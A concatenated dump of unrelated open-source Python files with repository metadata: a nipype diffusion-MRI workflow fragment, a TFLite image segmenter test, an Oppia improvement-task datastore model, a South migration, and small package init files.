(mms['phsamples'], make_dyads, [('outputnode.merged', 'phi_vol')]),
# (xfibres, m_mdsamples, [('mean_dsamples', 'in_files')]),
(make_dyads, outputnode, [('dyads', 'dyads'),
('dispersion', 'dyads_disp')])
])
return wf
def merge_and_mean(name='mm'):
inputnode = pe.Node(niu.IdentityInterface(fields=['in_files']),
name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['merged', 'mean']),
name='outputnode')
merge = pe.MapNode(fsl.Merge(dimension='z'), name='Merge',
iterfield=['in_files'])
mean = pe.MapNode(fsl.ImageMaths(op_string='-Tmean'), name='Mean',
iterfield=['in_file'])
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, merge, [(('in_files', transpose), 'in_files')]),
(merge, mean, [('merged_file', 'in_file')]),
(merge, outputnode, [('merged_file', 'merged')]),
(mean, outputnode, [('out_file', 'mean')])
])
return wf
def bedpostx_parallel(name='bedpostx_parallel',
compute_all_outputs=True,
params={'n_fibres': 2, 'fudge': 1, 'burn_in': 1000,
'n_jumps': 1250, 'sample_every': 25, 'model': 1,
'cnlinear': True}):
"""
    Does the same as :func:`.create_bedpostx_pipeline` by splitting
    the input dMRI in small ROIs that are better suited for parallel
    processing.
Example
-------
>>> from nipype.workflows.dmri.fsl.dti import bedpostx_parallel
>>> params = dict(n_fibres = 2, fudge = 1, burn_in = 1000,
... n_jumps = 1250, sample_every = 25)
>>> bpwf = bedpostx_parallel('nipype_bedpostx_parallel', params=params)
>>> bpwf.inputs.inputnode.dwi = 'diffusion.nii'
>>> bpwf.inputs.inputnode.mask = 'mask.nii'
>>> bpwf.inputs.inputnode.bvecs = 'bvecs'
>>> bpwf.inputs.inputnode.bvals = 'bvals'
>>> bpwf.run(plugin='CondorDAGMan') # doctest: +SKIP
Inputs::
inputnode.dwi
inputnode.mask
inputnode.bvecs
inputnode.bvals
Outputs::
outputnode wraps all XFibres outputs
"""
inputnode = pe.Node(niu.IdentityInterface(fields=['dwi', 'mask',
'bvecs', 'bvals']), name='inputnode')
slice_dwi = pe.Node(misc.SplitROIs(roi_size=(5, 5, 1)), name='slice_dwi')
if params is not None:
xfib_if = fsl.XFibres5(**params)
else:
xfib_if = fsl.XFibres5()
xfibres = pe.MapNode(xfib_if, name='xfibres',
iterfield=['dwi', 'mask'])
mrg_dyads = pe.MapNode(misc.MergeROIs(), name='Merge_dyads',
iterfield=['in_files'])
mrg_fsamp = pe.MapNode(misc.MergeROIs(), name='Merge_mean_fsamples',
iterfield=['in_files'])
out_fields = ['dyads', 'fsamples']
if compute_all_outputs:
out_fields += ['dyads_disp', 'thsamples', 'phsamples',
'mean_fsamples', 'mean_thsamples', 'mean_phsamples',
'merged_fsamples', 'merged_thsamples',
'merged_phsamples']
outputnode = pe.Node(niu.IdentityInterface(fields=out_fields),
name='outputnode')
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, slice_dwi, [('dwi', 'in_file'),
('mask', 'in_mask')]),
(slice_dwi, xfibres, [('out_files', 'dwi'),
('out_masks', 'mask')]),
(inputnode, xfibres, [('bvecs', 'bvecs'),
('bvals', 'bvals')]),
(inputnode, mrg_dyads, [('mask', 'in_reference')]),
(xfibres, mrg_dyads, [(('dyads', transpose), 'in_files')]),
(slice_dwi, mrg_dyads, [('out_index', 'in_index')]),
(inputnode, mrg_fsamp, [('mask', 'in_reference')]),
(xfibres, mrg_fsamp, [(('mean_fsamples', transpose), 'in_files')]),
(slice_dwi, mrg_fsamp, [('out_index', 'in_index')]),
(mrg_dyads, outputnode, [('merged_file', 'dyads')]),
(mrg_fsamp, outputnode, [('merged_file', 'fsamples')])
])
if compute_all_outputs:
make_dyads = pe.MapNode(fsl.MakeDyadicVectors(), name="Make_dyads",
iterfield=['theta_vol', 'phi_vol'])
wf.connect([(inputnode, make_dyads, [('mask', 'mask')])])
mms = {}
for k in ['thsamples', 'phsamples', 'fsamples']:
mms[k] = merge_and_mean_parallel(k)
wf.connect([
(slice_dwi, mms[k], [('out_index', 'inputnode.in_index')]),
(inputnode, mms[k], [('mask', 'inputnode.in_reference')]),
(xfibres, mms[k], [(k, 'inputnode.in_files')]),
(mms[k], outputnode, [('outputnode.merged', 'merged_%s' % k),
('outputnode.mean', 'mean_%s' % k)])
])
# m_mdsamples = pe.Node(fsl.Merge(dimension="z"),
# name="merge_mean_dsamples")
wf.connect([
(mms['thsamples'], make_dyads, [('outputnode.merged', 'theta_vol')]),
(mms['phsamples'], make_dyads, [('outputnode.merged', 'phi_vol')]),
# (xfibres, m_mdsamples, [('mean_dsamples', 'in_files')]),
(make_dyads, outputnode, [('dispersion', 'dyads_disp')])
])
return wf
def merge_and_mean_parallel(name='mm'):
inputnode = pe.Node(niu.IdentityInterface(fields=['in_files',
'in_reference', 'in_index']), name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['merged', 'mean']),
name='outputnode')
merge = pe.MapNode(misc.MergeROIs(), name='Merge',
iterfield=['in_files'])
mean = pe.MapNode(fsl.ImageMaths(op_string='-Tmean'), name='Mean',
iterfield=['in_file'])
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, merge, [(('in_files', transpose), 'in_files'),
('in_reference', 'in_reference'),
('in_index', 'in_index')]),
(merge, mean, [('merged_file', 'in_file')]),
(merge, outputnode, [('merged_file', 'merged')]),
(mean, outputnode, [('out_file', 'mean')])
])
return wf
|
{
"content_hash": "ca61b95bb0b635f934a9ecf0a4b2ead5",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 102,
"avg_line_length": 39.266666666666666,
"alnum_prop": 0.5271147508239289,
"repo_name": "carolFrohlich/nipype",
"id": "ebcd46c84ffce8633e56f439ffb389238c0043a8",
"size": "10054",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "nipype/workflows/dmri/fsl/dti.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9823"
},
{
"name": "KiCad",
"bytes": "3797"
},
{
"name": "Makefile",
"bytes": "2320"
},
{
"name": "Matlab",
"bytes": "1717"
},
{
"name": "Python",
"bytes": "5451077"
},
{
"name": "Shell",
"bytes": "3302"
},
{
"name": "Tcl",
"bytes": "43408"
}
],
"symlink_target": ""
}
|
"""Tests for image_segmenter."""
import enum
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from tensorflow_lite_support.python.task.core import base_options as base_options_module
from tensorflow_lite_support.python.task.processor.proto import segmentation_options_pb2
from tensorflow_lite_support.python.task.processor.proto import segmentations_pb2
from tensorflow_lite_support.python.task.vision import image_segmenter
from tensorflow_lite_support.python.task.vision.core import tensor_image
from tensorflow_lite_support.python.test import test_util
_BaseOptions = base_options_module.BaseOptions
_ColoredLabel = segmentations_pb2.ColoredLabel
_OutputType = segmentation_options_pb2.OutputType
_ImageSegmenter = image_segmenter.ImageSegmenter
_ImageSegmenterOptions = image_segmenter.ImageSegmenterOptions
_MODEL_FILE = 'deeplabv3.tflite'
_IMAGE_FILE = 'segmentation_input_rotation0.jpg'
_SEGMENTATION_FILE = 'segmentation_golden_rotation0.png'
_EXPECTED_COLORED_LABELS = [
_ColoredLabel(color=(0, 0, 0), category_name='background', display_name=''),
_ColoredLabel(
color=(128, 0, 0), category_name='aeroplane', display_name=''),
_ColoredLabel(color=(0, 128, 0), category_name='bicycle', display_name=''),
_ColoredLabel(color=(128, 128, 0), category_name='bird', display_name=''),
_ColoredLabel(color=(0, 0, 128), category_name='boat', display_name=''),
_ColoredLabel(color=(128, 0, 128), category_name='bottle', display_name=''),
_ColoredLabel(color=(0, 128, 128), category_name='bus', display_name=''),
_ColoredLabel(color=(128, 128, 128), category_name='car', display_name=''),
_ColoredLabel(color=(64, 0, 0), category_name='cat', display_name=''),
_ColoredLabel(color=(192, 0, 0), category_name='chair', display_name=''),
_ColoredLabel(color=(64, 128, 0), category_name='cow', display_name=''),
_ColoredLabel(
color=(192, 128, 0), category_name='dining table', display_name=''),
_ColoredLabel(color=(64, 0, 128), category_name='dog', display_name=''),
_ColoredLabel(color=(192, 0, 128), category_name='horse', display_name=''),
_ColoredLabel(
color=(64, 128, 128), category_name='motorbike', display_name=''),
_ColoredLabel(
color=(192, 128, 128), category_name='person', display_name=''),
_ColoredLabel(
color=(0, 64, 0), category_name='potted plant', display_name=''),
_ColoredLabel(color=(128, 64, 0), category_name='sheep', display_name=''),
_ColoredLabel(color=(0, 192, 0), category_name='sofa', display_name=''),
_ColoredLabel(color=(128, 192, 0), category_name='train', display_name=''),
_ColoredLabel(color=(0, 64, 128), category_name='tv', display_name='')
]
_MASK_MAGNIFICATION_FACTOR = 10
_MATCH_PIXELS_THRESHOLD = 0.01
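# Note (assumption, not stated in the original file): the golden PNG appears
# to store category indices scaled by _MASK_MAGNIFICATION_FACTOR (presumably
# so the classes are distinguishable when the PNG is viewed directly), which
# is why the raw category mask is multiplied by this factor before the
# pixel-by-pixel comparison against the ground truth below.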
def _create_segmenter_from_options(base_options, **segmentation_options):
segmentation_options = segmentation_options_pb2.SegmentationOptions(
**segmentation_options)
options = _ImageSegmenterOptions(
base_options=base_options, segmentation_options=segmentation_options)
segmenter = _ImageSegmenter.create_from_options(options)
return segmenter
class ModelFileType(enum.Enum):
FILE_CONTENT = 1
FILE_NAME = 2
class ImageSegmenterTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super().setUp()
self.test_image_path = test_util.get_test_data_path(_IMAGE_FILE)
self.test_seg_path = test_util.get_test_data_path(_SEGMENTATION_FILE)
self.model_path = test_util.get_test_data_path(_MODEL_FILE)
def test_create_from_file_succeeds_with_valid_model_path(self):
# Creates with default option and valid model file successfully.
segmenter = _ImageSegmenter.create_from_file(self.model_path)
self.assertIsInstance(segmenter, _ImageSegmenter)
def test_create_from_options_succeeds_with_valid_model_path(self):
# Creates with options containing model file successfully.
base_options = _BaseOptions(file_name=self.model_path)
options = _ImageSegmenterOptions(base_options=base_options)
segmenter = _ImageSegmenter.create_from_options(options)
self.assertIsInstance(segmenter, _ImageSegmenter)
def test_create_from_options_fails_with_invalid_model_path(self):
# Invalid empty model path.
with self.assertRaisesRegex(
ValueError,
r"ExternalFile must specify at least one of 'file_content', "
r"'file_name' or 'file_descriptor_meta'."):
base_options = _BaseOptions(file_name='')
options = _ImageSegmenterOptions(base_options=base_options)
_ImageSegmenter.create_from_options(options)
def test_create_from_options_succeeds_with_valid_model_content(self):
# Creates with options containing model content successfully.
with open(self.model_path, 'rb') as f:
base_options = _BaseOptions(file_content=f.read())
options = _ImageSegmenterOptions(base_options=base_options)
segmenter = _ImageSegmenter.create_from_options(options)
self.assertIsInstance(segmenter, _ImageSegmenter)
@parameterized.parameters(
(ModelFileType.FILE_NAME, _EXPECTED_COLORED_LABELS),
(ModelFileType.FILE_CONTENT, _EXPECTED_COLORED_LABELS))
def test_segment_model(self, model_file_type, expected_colored_labels):
# Creates segmenter.
if model_file_type is ModelFileType.FILE_NAME:
base_options = _BaseOptions(file_name=self.model_path)
elif model_file_type is ModelFileType.FILE_CONTENT:
with open(self.model_path, 'rb') as f:
model_content = f.read()
base_options = _BaseOptions(file_content=model_content)
else:
# Should never happen
raise ValueError('model_file_type is invalid.')
segmenter = _create_segmenter_from_options(base_options)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Performs image segmentation on the input.
segmentation = segmenter.segment(image).segmentations[0]
colored_labels = segmentation.colored_labels
# Comparing results.
self.assertEqual(colored_labels, expected_colored_labels,
'Colored labels do not match.')
def test_segmentation_category_mask(self):
"""Check if category mask matches with ground truth."""
# Creates segmenter.
base_options = _BaseOptions(file_name=self.model_path)
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CATEGORY_MASK)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Performs image segmentation on the input.
segmentation = segmenter.segment(image).segmentations[0]
result_pixels = segmentation.category_mask.flatten()
    # Check if the data type of the category mask is correct.
self.assertEqual(result_pixels.dtype, np.uint8)
# Loads ground truth segmentation file.
gt_segmentation = tensor_image.TensorImage.create_from_file(
self.test_seg_path)
gt_segmentation_array = gt_segmentation.buffer
gt_segmentation_shape = gt_segmentation_array.shape
num_pixels = gt_segmentation_shape[0] * gt_segmentation_shape[1]
ground_truth_pixels = gt_segmentation_array.flatten()
self.assertEqual(
len(result_pixels), len(ground_truth_pixels),
'Segmentation mask size does not match the ground truth mask size.')
inconsistent_pixels = 0
for index in range(num_pixels):
inconsistent_pixels += (
result_pixels[index] * _MASK_MAGNIFICATION_FACTOR !=
ground_truth_pixels[index])
self.assertLessEqual(
inconsistent_pixels / num_pixels, _MATCH_PIXELS_THRESHOLD,
f'Number of pixels in the candidate mask differing from that of the '
f'ground truth mask exceeds {_MATCH_PIXELS_THRESHOLD}.')
def test_segmentation_confidence_mask_matches_category_mask(self):
"""Check if the confidence mask matches with the category mask."""
# Create BaseOptions from model file.
base_options = _BaseOptions(file_name=self.model_path)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Run segmentation on the model in CATEGORY_MASK mode.
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CATEGORY_MASK)
# Performs image segmentation on the input and gets the category mask.
segmentation = segmenter.segment(image).segmentations[0]
category_mask = segmentation.category_mask
# Run segmentation on the model in CONFIDENCE_MASK mode.
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CONFIDENCE_MASK)
# Performs image segmentation on the input again.
segmentation = segmenter.segment(image).segmentations[0]
# Gets the list of confidence masks and colored_labels.
confidence_masks = segmentation.confidence_masks
colored_labels = segmentation.colored_labels
    # Check that the number of confidence masks matches the number of categories.
self.assertEqual(
len(confidence_masks), len(colored_labels),
'Number of confidence masks must match with number of categories.')
# Gather the confidence masks in a single array `confidence_mask_array`.
confidence_mask_array = np.array(
[confidence_mask.value for confidence_mask in confidence_masks])
    # Check if the data type of `confidence_masks` is correct.
    self.assertEqual(confidence_mask_array.dtype, np.float64)
# Compute the category mask from the created confidence mask.
calculated_category_mask = np.argmax(confidence_mask_array, axis=0)
self.assertListEqual(
calculated_category_mask.tolist(), category_mask.tolist(),
'Confidence mask does not match with the category mask.')
if __name__ == '__main__':
tf.test.main()
|
{
"content_hash": "a85b4be87c2896292810d7021c24f2e6",
"timestamp": "",
"source": "github",
"line_count": 224,
"max_line_length": 88,
"avg_line_length": 43.69642857142857,
"alnum_prop": 0.7155700858193706,
"repo_name": "chromium/chromium",
"id": "3b0a01e1b135809e88eb573bdbc15b49ae373709",
"size": "10396",
"binary": false,
"copies": "9",
"ref": "refs/heads/main",
"path": "third_party/tflite_support/src/tensorflow_lite_support/python/test/task/vision/image_segmenter_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Models related to Oppia improvement tasks."""
from __future__ import annotations
from core.constants import constants
from core.platform import models
from typing import Dict, List, Optional
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import base_models
from mypy_imports import datastore_services
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
datastore_services = models.Registry.import_datastore_services()
TASK_ENTITY_TYPE_EXPLORATION = constants.TASK_ENTITY_TYPE_EXPLORATION
TASK_ENTITY_TYPES = (
TASK_ENTITY_TYPE_EXPLORATION,
)
TASK_STATUS_OPEN = constants.TASK_STATUS_OPEN
TASK_STATUS_OBSOLETE = constants.TASK_STATUS_OBSOLETE
TASK_STATUS_RESOLVED = constants.TASK_STATUS_RESOLVED
TASK_STATUS_CHOICES = (
TASK_STATUS_OPEN,
TASK_STATUS_OBSOLETE,
TASK_STATUS_RESOLVED,
)
TASK_TARGET_TYPE_STATE = constants.TASK_TARGET_TYPE_STATE
TASK_TARGET_TYPES = (
TASK_TARGET_TYPE_STATE,
)
TASK_TYPE_HIGH_BOUNCE_RATE = constants.TASK_TYPE_HIGH_BOUNCE_RATE
TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP = (
constants.TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP)
TASK_TYPE_NEEDS_GUIDING_RESPONSES = constants.TASK_TYPE_NEEDS_GUIDING_RESPONSES
TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS = (
constants.TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS)
TASK_TYPES = (
TASK_TYPE_HIGH_BOUNCE_RATE,
TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP,
TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS,
TASK_TYPE_NEEDS_GUIDING_RESPONSES,
)
class TaskEntryModel(base_models.BaseModel):
"""Model representation of an actionable task from the improvements tab.
The ID of a task has the form: "[entity_type].[entity_id].[entity_version].
[task_type].[target_type].[target_id]".
"""
# Utility field which results in a 20% speedup compared to querying by each
    # of the individual fields used to compose it.
# Value has the form: "[entity_type].[entity_id].[entity_version]".
composite_entity_id = datastore_services.StringProperty(
required=True, indexed=True)
# The type of entity a task entry refers to.
entity_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_ENTITY_TYPES)
# The ID of the entity a task entry refers to.
entity_id = datastore_services.StringProperty(
required=True, indexed=True)
# The version of the entity a task entry refers to.
entity_version = datastore_services.IntegerProperty(
required=True, indexed=True)
# The type of task a task entry tracks.
task_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_TYPES)
# The type of sub-entity a task entry focuses on. Value is None when an
# entity does not have any meaningful sub-entities to target.
target_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_TARGET_TYPES)
# Uniquely identifies the sub-entity a task entry focuses on. Value is None
# when an entity does not have any meaningful sub-entities to target.
target_id = datastore_services.StringProperty(
required=True, indexed=True)
# A sentence generated by Oppia to describe why the task was created.
issue_description = datastore_services.StringProperty(
default=None, required=False, indexed=True)
# Tracks the state/progress of a task entry.
status = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_STATUS_CHOICES)
# ID of the user who closed the task, if any.
resolver_id = datastore_services.StringProperty(
default=None, required=False, indexed=True)
# The date and time at which a task was closed or deprecated.
resolved_on = datastore_services.DateTimeProperty(
default=None, required=False, indexed=True)
@classmethod
def has_reference_to_user_id(cls, user_id: str) -> bool:
"""Check whether any TaskEntryModel references the given user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.resolver_id == user_id).get() is not None
@staticmethod
def get_deletion_policy() -> base_models.DELETION_POLICY:
"""Model contains data to delete corresponding to a user:
resolver_id field.
It is okay to delete task entries since, after they are resolved, they
only act as a historical record. The removal just removes the historical
record.
"""
return base_models.DELETION_POLICY.DELETE
@classmethod
def apply_deletion_policy(cls, user_id: str) -> None:
"""Delete instances of TaskEntryModel for the user.
Args:
user_id: str. The ID of the user whose data should be deleted.
"""
task_entry_keys = (
cls.query(cls.resolver_id == user_id).fetch(keys_only=True))
datastore_services.delete_multi(task_entry_keys)
@staticmethod
def get_model_association_to_user(
) -> base_models.MODEL_ASSOCIATION_TO_USER:
"""Model is exported as one instance shared across users since multiple
users resolve tasks.
"""
return (
base_models
.MODEL_ASSOCIATION_TO_USER
.ONE_INSTANCE_SHARED_ACROSS_USERS)
@classmethod
def get_export_policy(cls) -> Dict[str, base_models.EXPORT_POLICY]:
"""Model contains data to export corresponding to a user:
TaskEntryModel contains the ID of the user that acted on a task.
"""
return dict(super(cls, cls).get_export_policy(), **{
'composite_entity_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_version': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'task_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'target_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'target_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'issue_description': base_models.EXPORT_POLICY.EXPORTED,
'status': base_models.EXPORT_POLICY.EXPORTED,
'resolver_id': base_models.EXPORT_POLICY.EXPORTED,
'resolved_on': base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def get_field_name_mapping_to_takeout_keys(cls) -> Dict[str, str]:
"""Defines the mapping of field names to takeout keys since this model
is exported as one instance shared across users.
"""
return {
'resolver_id': 'task_ids_resolved_by_user',
'issue_description': 'issue_descriptions',
'status': 'statuses',
'resolved_on': 'resolution_msecs'
}
@staticmethod
def export_data(user_id: str) -> Dict[str, List[str]]:
"""Returns the user-relevant properties of TaskEntryModels.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. The user-relevant properties of TaskEntryModel in a dict
format. In this case, we are returning all the ids of the tasks
which were closed by this user.
"""
task_ids_resolved_by_user = TaskEntryModel.query(
TaskEntryModel.resolver_id == user_id)
return {
'task_ids_resolved_by_user': (
[t.id for t in task_ids_resolved_by_user]),
'issue_descriptions': (
[t.issue_description for t in task_ids_resolved_by_user]),
'statuses': (
[t.status for t in task_ids_resolved_by_user]),
'resolution_msecs': (
[t.resolved_on for t in task_ids_resolved_by_user]),
}
@classmethod
def generate_task_id(
cls,
entity_type: str,
entity_id: str,
entity_version: int,
task_type: str,
target_type: str,
target_id: str
) -> str:
"""Generates a new task entry ID.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
task_type: str. The type of task a task entry tracks.
target_type: str. The type of sub-entity a task entry refers to.
target_id: str. The ID of the sub-entity a task entry refers to.
Returns:
str. The ID for the given task.
"""
return '%s.%s.%d.%s.%s.%s' % (
entity_type, entity_id, entity_version, task_type, target_type,
target_id)
@classmethod
def generate_composite_entity_id(
cls,
entity_type: str,
entity_id: str,
entity_version: int
) -> str:
"""Generates a new composite_entity_id value.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
Returns:
str. The composite_entity_id for the given task.
"""
return '%s.%s.%d' % (entity_type, entity_id, entity_version)
@classmethod
def create(
cls,
entity_type: str,
entity_id: str,
entity_version: int,
task_type: str,
target_type: str,
target_id: str,
issue_description: Optional[str] = None,
status: str = TASK_STATUS_OBSOLETE,
resolver_id: Optional[str] = None,
        resolved_on: Optional[datetime.datetime] = None
) -> str:
"""Creates a new task entry and puts it in storage.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
task_type: str. The type of task a task entry tracks.
target_type: str. The type of sub-entity a task entry refers to.
target_id: str. The ID of the sub-entity a task entry refers to.
issue_description: str. Sentence generated by Oppia to describe why
the task was created.
status: str. Tracks the state/progress of a task entry.
resolver_id: str. ID of the user who closed the task, if any.
            resolved_on: datetime.datetime. The date and time at which a task
                was closed or deprecated.
Returns:
str. The ID of the new task.
Raises:
Exception. A task corresponding to the provided identifier values
(entity_type, entity_id, entity_version, task_type, target_type,
target_id) already exists in storage.
"""
task_id = cls.generate_task_id(
entity_type, entity_id, entity_version, task_type, target_type,
target_id)
if cls.get_by_id(task_id) is not None:
raise Exception('Task id %s already exists' % task_id)
composite_entity_id = cls.generate_composite_entity_id(
entity_type, entity_id, entity_version)
task_entry = cls(
id=task_id,
composite_entity_id=composite_entity_id,
entity_type=entity_type,
entity_id=entity_id,
entity_version=entity_version,
task_type=task_type,
target_type=target_type,
target_id=target_id,
issue_description=issue_description,
status=status,
resolver_id=resolver_id,
resolved_on=resolved_on)
task_entry.update_timestamps()
task_entry.put()
return task_id
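# Illustrative usage (not part of the model; assumes the constants above map
# to the lowercase strings shown):
#     task_id = TaskEntryModel.create(
#         'exploration', 'exp_1', 3, TASK_TYPE_HIGH_BOUNCE_RATE,
#         TASK_TARGET_TYPE_STATE, 'Introduction',
#         issue_description='Many learners leave this card.')
#     # task_id == 'exploration.exp_1.3.high_bounce_rate.state.Introduction'
#     # and the stored composite_entity_id is 'exploration.exp_1.3'.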
|
{
"content_hash": "2f8ae08b1b6c571954091470ee493ce5",
"timestamp": "",
"source": "github",
"line_count": 309,
"max_line_length": 80,
"avg_line_length": 39.271844660194176,
"alnum_prop": 0.6260403790688093,
"repo_name": "kevinlee12/oppia",
"id": "dc71ac16464fb4f2f2468ad306d85364fa0495a1",
"size": "12758",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "core/storage/improvements/gae_models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "205771"
},
{
"name": "HTML",
"bytes": "1835761"
},
{
"name": "JavaScript",
"bytes": "1182599"
},
{
"name": "PEG.js",
"bytes": "71377"
},
{
"name": "Python",
"bytes": "13670639"
},
{
"name": "Shell",
"bytes": "2239"
},
{
"name": "TypeScript",
"bytes": "13024194"
}
],
"symlink_target": ""
}
|
"""
This module holds a wsgi server and future web-related code.
"""
|
{
"content_hash": "7bd862bca9821fe8055518e72e480715",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 60,
"avg_line_length": 24,
"alnum_prop": 0.6805555555555556,
"repo_name": "ionelmc/python-cogen",
"id": "e4bfb67aac754164137851c62bf9b3407fa28601",
"size": "72",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "cogen/web/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "34085"
},
{
"name": "CSS",
"bytes": "1481"
},
{
"name": "HTML",
"bytes": "34029"
},
{
"name": "JavaScript",
"bytes": "206112"
},
{
"name": "Mako",
"bytes": "1292"
},
{
"name": "Python",
"bytes": "341182"
},
{
"name": "Shell",
"bytes": "184"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'User.verified'
db.alter_column('fandjango_user', 'verified', self.gf('django.db.models.fields.NullBooleanField')(null=True))
def backwards(self, orm):
# Changing field 'User.verified'
db.alter_column('fandjango_user', 'verified', self.gf('django.db.models.fields.BooleanField')())
models = {
'fandjango.oauthtoken': {
'Meta': {'object_name': 'OAuthToken'},
'expires_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued_at': ('django.db.models.fields.DateTimeField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'fandjango.user': {
'Meta': {'object_name': 'User'},
'authorized': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {}),
'facebook_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hometown': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'last_seen_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'oauth_token': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fandjango.OAuthToken']", 'unique': 'True'}),
'political_views': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'relationship_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'verified': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['fandjango']
|
{
"content_hash": "fa495abe9f3c1e5549a57bb453cd379d",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 138,
"avg_line_length": 65.9074074074074,
"alnum_prop": 0.5580219162686147,
"repo_name": "jgorset/fandjango",
"id": "185a027fcd972e552900d26c471e47e7ef190873",
"size": "3577",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fandjango/migrations/0004_auto__chg_field_user_verified.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "884"
},
{
"name": "Makefile",
"bytes": "112"
},
{
"name": "Python",
"bytes": "95704"
}
],
"symlink_target": ""
}
|
from flask import Blueprint
wechat = Blueprint('wechat', __name__)
from . import views
|
{
"content_hash": "12475ca88a5be7669727b2fb704a9b2b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 38,
"avg_line_length": 17.6,
"alnum_prop": 0.7272727272727273,
"repo_name": "archever/archever_me",
"id": "33cbaf4368049f10e772de18841a8422870b64cd",
"size": "89",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/wechat/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13724"
}
],
"symlink_target": ""
}
|
import six
from . import unittest
from kafka.partitioner import (Murmur2Partitioner)
